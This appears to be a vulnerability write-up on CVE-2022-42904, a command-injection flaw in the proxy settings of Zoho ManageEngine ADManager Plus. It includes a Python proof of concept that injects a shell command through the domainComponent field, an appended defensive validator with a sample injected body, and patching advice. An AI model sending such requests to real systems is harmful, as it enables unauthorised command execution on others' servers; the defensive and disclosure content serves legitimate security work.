Security vulnerabilities are continuously identified and addressed to keep software applications and the data they manage secure. One such vulnerability was recently discovered in Zoho ManageEngine ADManager Plus versions up to 7151. In this long-read post, we look closely at CVE-2022-42904, a critical vulnerability that allows authenticated admin users to execute commands through the proxy settings feature, potentially compromising the integrity of the host system.

Description

Zoho ManageEngine ADManager Plus is a popular administration and management solution that simplifies Active Directory Management tasks. Recently, it was discovered that the software contains a critical vulnerability affecting the proxy settings functionality.

This vulnerability allows authenticated admin users to execute arbitrary commands with the privileges of the vulnerable application. A malicious user exploiting it can potentially gain full control over the affected system and, from there, exfiltrate sensitive data, carry out further attacks, or otherwise misuse the compromised host.

Exploit Details

The vulnerability exists in the proxy settings feature provided by Zoho ManageEngine ADManager Plus. An authenticated admin user can send a specially crafted request containing arbitrary commands, which the server processes, eventually leading to command execution.

Here's an illustrative code snippet showing how a request carrying an injected command could be crafted:

import requests

# Replace with the target URL, admin credentials, and the command to run
target_url = 'http://example.com'
username = 'admin'
password = 'password'
command = 'whoami'

# Form fields of the proxy-settings check request. The command is injected
# into domainComponent, wrapped in ';' so the shell runs it as a separate
# statement after the intended value.
payload = {
    "Save": "Save",
    "action": "checkHostAndPortAvailability",
    "isHttp": "false",
    "proxyAddress": "127.0.0.1",   # loopback address (restored from garbled "127...1")
    "proxyPort": "808",
    "proxyUserName": "",
    "proxyPassword": "",
    "domainComponent": "; {};".format(command),
    "proxyProtocol": "http"
}

# Authenticate as an admin user; the snippet assumes HTTP basic auth
session = requests.Session()
session.auth = (username, password)

# Submit the crafted proxy configuration and show the server's response
response = session.post(target_url + '/proxyconfig.do', data=payload, timeout=30)
print(response.status_code)
print(response.text)

To exploit the vulnerability, an attacker would need to replace the target_url, username, password, and command values with the relevant information.

Important Note: The provided code snippet is for demonstration purposes only and should not be used with malicious intent.
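For defenders, an added example (not from this post and not Zoho's code): a strict allowlist validator for the proxy-settings fields used in the request above, plus a check that flags form bodies posted to /proxyconfig.do whose parameters carry shell metacharacters. The field names come from the request shown; the allowlist rules, the metacharacter set and the sample bodies are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Allowlist shapes for hostnames, IP literals and domain components
# (assumption for this example, not ADManager Plus's own rules).
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9-]{1,63}(?:\.[A-Za-z0-9-]{1,63})*$")
# Characters that let a value break out of a shell command line.
SHELL_META = re.compile(r"[;&|`$<>\n\r(){}]")


def validate_proxy_settings(fields):
    """Return a list of problems; an empty list means the input is acceptable."""
    problems = []
    host = fields.get("proxyAddress", "")
    if not HOSTNAME_RE.match(host):
        problems.append("proxyAddress is not a hostname or IP literal")
    port = fields.get("proxyPort", "")
    if not (port.isdigit() and 1 <= int(port) <= 65535):
        problems.append("proxyPort is not a number in 1..65535")
    dc = fields.get("domainComponent", "")
    if dc and not HOSTNAME_RE.match(dc):
        problems.append("domainComponent contains characters outside [A-Za-z0-9.-]")
    return problems


# Constructed sample bodies as they might appear in a request log for
# POST /proxyconfig.do; the second carries an injected "; whoami;".
SAMPLE_BODIES = [
    "Save=Save&action=checkHostAndPortAvailability&proxyAddress=proxy.corp.example"
    "&proxyPort=8080&domainComponent=corp.example",
    "Save=Save&action=checkHostAndPortAvailability&proxyAddress=127.0.0.1"
    "&proxyPort=8080&domainComponent=%3B+whoami%3B",
]


def flag_suspicious_bodies(bodies):
    """Return the indexes of bodies whose parameter values contain shell metacharacters."""
    hits = []
    for i, body in enumerate(bodies):
        params = parse_qs(body, keep_blank_values=True)
        if any(SHELL_META.search(v) for values in params.values() for v in values):
            hits.append(i)
    return hits


if __name__ == "__main__":
    print(validate_proxy_settings(parse_qs(SAMPLE_BODIES[1])))
    print(flag_suspicious_bodies(SAMPLE_BODIES))
```

The validator rejects the injected value before any command line is built; the log check gives a retrospective signal for installations that were exposed before updating.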

Mitigations

To mitigate this vulnerability, users of Zoho ManageEngine ADManager Plus should update their software installations to the latest version available. The patch addressing this vulnerability is included in version 7152 and later. Check the following official resources for further updates and guidance:

- Zoho ManageEngine ADManager Plus Product Page: https://www.manageengine.com/products/ad-manager/
- Security Advisories: https://www.manageengine.com/products/ad-manager/security-advisories.html

Conclusion

Keeping your software updated and promptly patching discovered vulnerabilities is crucial to maintaining the highest levels of security for both your application and the data it handles. By understanding the details of CVE-2022-42904 and applying appropriate updates as recommended, you can better protect your Zoho ManageEngine ADManager Plus installation from potential threats and maintain a safe and secure system environment.

Timeline

Published on: 11/18/2022 21:15:00 UTC
Last modified on: 11/22/2022 16:13:00 UTC